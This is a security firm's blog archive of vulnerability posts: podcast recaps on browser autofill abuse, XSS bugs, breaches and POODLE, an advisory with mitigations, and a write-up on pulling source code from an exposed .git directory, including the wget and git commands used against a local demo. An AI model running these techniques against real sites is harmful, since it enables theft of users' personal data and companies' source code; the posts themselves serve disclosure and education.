Category Archives: Vulnerabilities

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week we decided to add a little bonus footage for a bit more technical content instead of just news stories. We mastered the power of Screensharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser Autocomplete hacking. This isn’t a new topic by any means but as us hackers get curious every once in a while, Jeremiah decided to see if this bug was still around.

The premise is simple: you can place a form on a website that you control. On that form you can ask for a user’s name. When you begin to type in that name, some browsers (Chrome & Safari featured in the video) will offer up the convenience of auto-filling the form for you. In this case the user doesn’t feel like typing their whole name out and allows the browser to do so. What the user doesn’t see is the rest of the form fields which are easily rendered invisible with simple CSS which are titled properly to grab the rest of the information out of your AutoFill contacts profile.

In the video Jeremiah shows how it is possible with a bit of tom foolery and Javascript to grab things like an unsuspecting user’s phone number, birthday, address, email, etc. just by having them starting to type in their name and letting AutoFill do the rest. This demo was done on Mac OSX using the latest versions of Safari and Chrome.

Again, not much new and revolutionary but still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is used widely as a simple form validator and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. This bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 – 1 million websites potentially using it, or similar vulnerable code. The piece that was amusing for all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging the bug was already in OSVDB from 2013 with no action taken. After warning the plugin’s author and writing the blog post on the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news since there are a ton of CAs out there already but what makes Let’s Encrypt interesting is the fact that it is a non-profit, *FREE*, certificate authority. The project is backed by EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers and is focusing on being free and easy-to-use to reduce the barrier to entry of encrypting your web traffic. Robert brings up a good question of browser support, if Microsoft or Google doesn’t support this right away it really only helps the 20% or so of the users using Firefox. The other question here is what effect this will have on for-profit Certificate Authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of this was terribly surprising to many of us in this industry but was certainly eye-opening for a lot of people out there. You can easily look up their advertising profile on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief I’m not into Reggaeton). However, the creepy one for me was the “Location History” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing as Mozilla also announced that they will be switching the default search engine used in FireFox to be Yahoo. This is HUGE news considering somewhere upwards of 95% of Mozilla’s revenue comes from the fact that Google pays to be the default engine. FireFox also still has 20% market share of browser users all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States that said the police are allowed to compel people for any sort of biometric-based authentication but not password-based. For example, a judge has said it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone but still not so for a four-digit-pin. This has all sorts of interesting implications when it comes to information security and personal privacy when it comes to law enforcement.

With absolutely no segway we covered a new story about China which seems to be one of Robert’s favorite topics. Turns out that China came out with a list of a ton of new websites they blocked from anybody accessing and one that stood out was Edgecast. Edgecast was particularly interesting because on it’s own it isn’t a website worth noting but they are a CDN which means China has blocked all of their customers as well which could affect hundreds of thousands of sites. The comparison was made of it being like blocking Akamai. Will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, often the affected company will [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL Injection, brute-force, phishing, password reuse, old and well-known vulnerability, etc).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an to attempt convey that the company did nothing wrong, that there was nothing they could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that they “take security seriously,” — so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec of what constitutes a ‘sophisticated’ attack. Clearly, some attacks are actually sophisticated – Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The tweets received were fairly consistent. I distilled the thoughts down to set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.

#HackerKast 8: Recap ofJPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast, with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not any of their main webpages but a one-off brochureware type site to promote and organize a company-sponsored running race event.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness that is pointed out here is that most of these types of services utilize a four-digit pin to get to your reward points account. Robert makes a great point here that even if they move from four-digit pins to a password system, they stop can make it more difficult to brute force, but if the bad guys find value here they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion network version of Facebook that has begun to get set up for the sake of some anonymous usage of Facebook. There is the obvious use of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out and not worry about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface but they allowed you to upload this JSON file which had some additional configs and inputs for SEO tags. This file was not sanitized and an XSS injection could be stored making it persistent and via file upload. Pretty juicy stuff!

Finally we wrapped up talking about Google some more with a bypass of Gmail two-factor authentication. Specifically, the attack in question here was going after the text message implementation of the 2FA and not the tokenization app that Google puts out. There are a list of ways that this can happen but the particular, most recent, story we are talking about involves attackers calling up mobile providers and social engineering their way into accessing text messages to get the second factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

#HackerKast 7: Drupal Compromise, Tor + Bitcoin Decloaking, Verizon’s ‘Perma-Cookie,’ and Formula One Racing

This week Jeremiah Grossman, Robert Hansen and Matt Johansen discuss the latest around the recent compromise to Drupal which affects any Drupal 7 site that was not patched prior to Oct. 17. Also, Robert takes us to the Circuit of the Americas Track in Austin to talk a little about a Tor + Bitcoin can effectively decloak people and even allow users to steal all the user’s bitcoins. Also a topic of discussion this week: Verizon’s Unique Identifier Header, or UIDH (aka a ‘Perma-Cookie’) which can be read by any web server that you visit and used to build a profile of your internet habits.

Resources:
Assume ‘Every Drupal 7 Site Was Compromised’ Unless Patched By Oct. 15

Verizon’s ‘Perma-Cookie’ Is a Privacy-Killing Machine

Bitcoin Over Tor Isn’t a Good Idea

#HackerKast 6: Microsoft Takes Over No-IP, LASCON 2014 Wrap-up, Shopping Cart Software Security

This week Jeremiah Grossman, Robert Hansen and Matt Johansen talk about interesting news and talks out of LASCON as well Microsoft taking over small Internet service provide No-IP and @mattjay gloats about taking the top spot in the recent WhiteHat HackerKombat competition with the most individual flags captured.

Resources:
How Microsoft Appointed Itself Sheriff of the Internet

‘Spam Nation’ Publisher Discloses Card Breach

#HackerKast 5: POODLE Attack, HackerKombat and Drupal SQLi Flaw

This week Jeremiah Grossman, Robert Hansen and Gabe Gumbs host HackerKast at Levi’s Stadium – the home of the SF 49ers – to discuss the recently announced POODLE Attack on SSL 3.0 and a critical SQLi flaw affecting Drupal making headlines. WhiteHat’s 6th HackerKombat capture the flag competition will also stream LIVE on Twitch.tv.

Watch HackerKombat LIVE starting at 3 pm PT on 10/17:
http://www.twitch.tv/hackerkombat

Other Resources:
POODLE Attack Information:
https://blog.whitehatsec.com/what-you-need-to-know-about-poodlessl-3-0-vulnerability/
http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html
https://www.openssl.org/~bodo/ssl-poodle.pdf

Drupal SQLi Flaw Advisory:
https://www.drupal.org/SA-CORE-2014-005
http://news.techworld.com/security/3581251/drupal-releases-patch-for-severe-sql-injection-flaw/?olo=rss

What you need to know about POODLE/SSL 3.0 vulnerability

UPDATE – 10/16 12:45 p.m. PT: For users with Akamai sites, Akamai has made the following updates:

  • Akamai is going to be disabling SSLv3 and SSLv2 support on an aggressive timeline
  • If SSLv3 support is necessary for legacy support clients can be exempted upon request

  • Users that utilize Akamai should contact Akamai for further details. Here are some Akamai blogs which clients may find helpful:
    SSL is dead, long live TLS
    Excerpt: How POODLE happened

    UPDATE – 10/15 7:15 p.m. PT: WhiteHat Security has added testing for the new POODLE attack. These vulnerabilities will be shown as ‘Insufficient Transport Layer Protection’ in the Sentinel interface. They will have the description ‘CVE-2014-3566 – POODLE Attack’. These tests will be run at the start of a new scan.

    Google researchers released a new SSL vulnerability yesterday nicknamed “POODLE Attack.” POODLE, which stands for Padding Oracle On Downgraded Legacy Encryption, is an attack that targets SSL version 3.0 and allows interception and compromise of supposedly secured data.

    Only SSL version 3.0 is known to be effected by this exploit. Although SSL 3.0 is extremely outdated, connection failures will result in older versions of SSL being used in an attempt to establish connection. Attackers can leverage this and force connection reattempts with SSL 3.0.

    Disabling SSL 3.0 will fix the issue however unforeseen compatibility problems may exist on sites. The Google researchers recommended supporting TLS_FALLBACK_SCSV. It’s also important to note that RC4 encryption has no padding, and as such is not vulnerable to this specific attack – although RC4 is not exempt from known issues as well.

    WhiteHat Security is currently researching a check for the POODLE Attack and will implement it as soon as it is possible.

    If you want to protect yourself in your browser, as Robert Graham with Errata Security has suggested, disabling SSLv3 in browsers is easy. On Chrome, Chromium and Aviator, use the command-line flag –ssl-version-min=tls1, and on Firefox set security.tls.version.min to 1. Mozilla also has an add-on available for disabling SSL 3.0 in Firefox. If you choose not to do this, please make sure you avoid unknown wireless connections until an official update is available for your browser.

    We will continue to update this blog as more information about POODLE is known and as more information for our customers becomes available. If you have any questions please contact WhiteHat Customer Support at support@whitehatsec.com.

    How I stole source code with Directory Indexing and Git

    The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this you also have access to any commits and all logs that may exist in the repo.

    The following screenshots are from a recreation of the environment being run locally that I /etc/hosts mapped to http://demo.jkuskos.com. All client information has been redacted.

    image1 copy_Kuskos_10.14.14

    First, I confirmed that Directory Indexing was enabled. You’ll see why this is great in a moment.

    image2 copy_Kuskos_10.14.14

    The easiest way to download anything would be with a recursive wget(you simply need to set the flag -r).

    wget -r http://demo.jkuskos.com/.git/

    image3 copy_Kuskos_10.14.14

    Now let’s investigate. With the repository downloaded we can perform git commands on it.

    image4 copy_Kuskos_10.14.14

    Now that we can see which files exist in the repository, access to them is as simple as checking them out.

    git checkout *.php; ls;

    image5 copy_Kuskos_10.14.14

    This example is clearly simplified; however, the real site allowed me to find several SQL Injections and authorization bypasses that would have been cumbersome to find through dynamic blackbox testing alone. It also allowed me to find several files that would otherwise have been available only if you had the appropriate credential access. These types of flaws are easily found through static code analysis and much harder to find through a dynamic assessment only. As a hacker, turning a blackbox penetration test into a whitebox penetration test is always a victory.